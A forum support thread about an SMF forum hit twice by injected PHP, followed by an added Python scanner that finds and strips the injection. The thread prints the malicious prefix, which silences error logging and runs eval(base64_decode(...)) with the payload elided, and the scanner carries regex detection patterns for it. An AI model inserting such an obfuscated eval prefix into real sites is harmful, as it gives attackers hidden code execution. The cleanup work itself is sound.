
base64 hack


Krash.:

One of my guys has been hacked twice in the past month.  Base64 code in all index.php and some of the /Sources files.  Odd thing about it, when I tried to delete the entire forum, /forums/Themes/default/fonts/Screenge.ttf would not delete.  FileZilla was telling me the file was in use, and could not delete or rename any of the subdirs above it.  Permissions of all files were blank in FZ, and showed as 'xxx' when checking individual files - that appeared to be a server problem.  Was able to reset permissions to 755 and delete the file.  Same thing happened a month ago.

Has anyone else seen this?

Lout:
Similar thing regarding base64 reported here - http://www.simplemachines.org/community/index.php?topic=480455.0

You might want to contact the thread creator to compare notes.

busterone:
Yeah, he had only one that I know of, but it was also in the index.php in the /Themes folder.  He hasn't posted back yet on the results of checking all his files, so there could be more on his as well.

JBlaze:
Would there happen to be a wordpress installation on the same server? Is it shared hosting? There are a few exploits out there for non-updated versions of WordPress that could cause this.

http://www.dotblag.com/2012/03/12/wordpress-blog-infections/
http://secunia.com/advisories/49327/

Krash.:
The account is running on GoDaddy, and there's no WordPress install, just a website running above the forum.  We're seeing this in all index.php files and some /Sources/ files:


--- Code: ---
<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('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'));/*68066*/ ?><?php

// Try to handle it with the upper level index.php. (it should know what to do.)
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
	include (dirname(dirname(__FILE__)) . '/index.php');
else
	exit;

?>


--- End code ---

Something's happening with Screenge.ttf - it's a legit .ttf file, but when the forum is hacked, it doesn't allow itself to be deleted, and shows as a running process in FZ.  Same thing twice now, a month apart.  I'm a little creeped out about d/ling the file to my computer and looking in it.
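The injected prefix posted above has a fixed shape: its own `<?php ... ?>` block, bracketed by a numeric `/*tag*/` marker, that suppresses error output and then calls `eval(base64_decode('...'))`, glued in front of the real file. The script below is an added example, not code from the thread or from SMF, that walks a forum tree, flags any PHP file with an `eval(base64_decode(` call, and strips the prefix only when it matches that exact shape, so the original index.php is restored without ever executing the payload. The base64 argument is decoded for the analyst to read, never run. The sample infected file is constructed for the demo and carries a harmless made-up payload; the real payload is elided in the post.

```python
"""Find and strip the eval(base64_decode(...)) prefix described in the thread."""
import base64
import binascii
import os
import sys
from dataclasses import dataclass
from typing import List, Optional, Tuple
import re

# Loose indicator: any eval() fed by base64_decode() deserves a human look.
INDICATOR_RE = re.compile(r"@?eval\s*\(\s*base64_decode\s*\(", re.IGNORECASE)

# Strict form of the posted prefix: a numeric /*tag*/ marker, suppression calls,
# one eval(base64_decode('...')), the same marker again, then ?>. Anchored at the
# start of the file because that is where the dropper glues it on.
PREFIX_RE = re.compile(
    r"^<\?php\s*/\*(?P<tag>\d+)\*/"
    r".*?"
    r"@?eval\s*\(\s*base64_decode\s*\(\s*'(?P<b64>[A-Za-z0-9+/=]*)'\s*\)\s*\)\s*;"
    r"\s*/\*(?P=tag)\*/\s*\?>",
    re.DOTALL,
)


@dataclass
class Finding:
    path: str
    tag: Optional[str]        # numeric marker when the strict prefix matched
    payload: Optional[bytes]  # decoded payload for review; never executed
    exact: bool               # True only for the strict prefix form


def decode_payload(b64: str) -> Optional[bytes]:
    """Decode the base64 argument for analysis only."""
    try:
        return base64.b64decode(b64, validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_source(path: str, src: str) -> Optional[Finding]:
    """Return a Finding if src carries the injection, else None."""
    m = PREFIX_RE.match(src)
    if m:
        return Finding(path, m.group("tag"), decode_payload(m.group("b64")), True)
    if INDICATOR_RE.search(src):
        return Finding(path, None, None, False)
    return None


def clean_source(src: str) -> Tuple[str, bool]:
    """Strip the prefix when it matches the strict form; otherwise leave the
    file alone so a human decides (a loose hit may be the site's own code)."""
    m = PREFIX_RE.match(src)
    if not m:
        return src, False
    return src[m.end():], True


def scan_tree(root: str) -> List[Finding]:
    """Inspect every .php file under root and collect the findings."""
    findings: List[Finding] = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                finding = inspect_source(path, fh.read())
            if finding:
                findings.append(finding)
    return findings


# Constructed sample modelled on the posted prefix; the payload is a harmless
# string of our own, not the one from the post (which is elided there).
SAMPLE_PAYLOAD = base64.b64encode(b"echo 'payload would run here';").decode()
SAMPLE_INFECTED = (
    "<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); "
    "@ini_set('log_errors',0); @ini_set('display_errors','Off'); "
    "@eval( base64_decode('" + SAMPLE_PAYLOAD + "'));/*68066*/ ?><?php\n"
    "\n// Try to handle it with the upper level index.php. (it should know what to do.)\n"
    "if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))\n"
    "\tinclude (dirname(dirname(__FILE__)) . '/index.php');\n"
    "else\n\texit;\n\n?>\n"
)

if __name__ == "__main__":
    # usage: python scan.py /path/to/forum   (reports only; clean by hand after review)
    for f in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        kind = "exact prefix, tag " + str(f.tag) if f.exact else "loose indicator"
        print(f"{f.path}: {kind}")
        if f.payload is not None:
            print("  payload:", f.payload[:80])
```

The scanner reports rather than rewrites, because an exact match still tells you only that the file was modified; the sibling files the dropper touched, the upload or credential that let it in, and a second backdoor elsewhere in /Sources/ are what the cleanup actually has to find. Use `clean_source` on each exact finding once the whole tree has been reviewed, and compare the result against a pristine copy of the same SMF release rather than trusting the stripped file.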


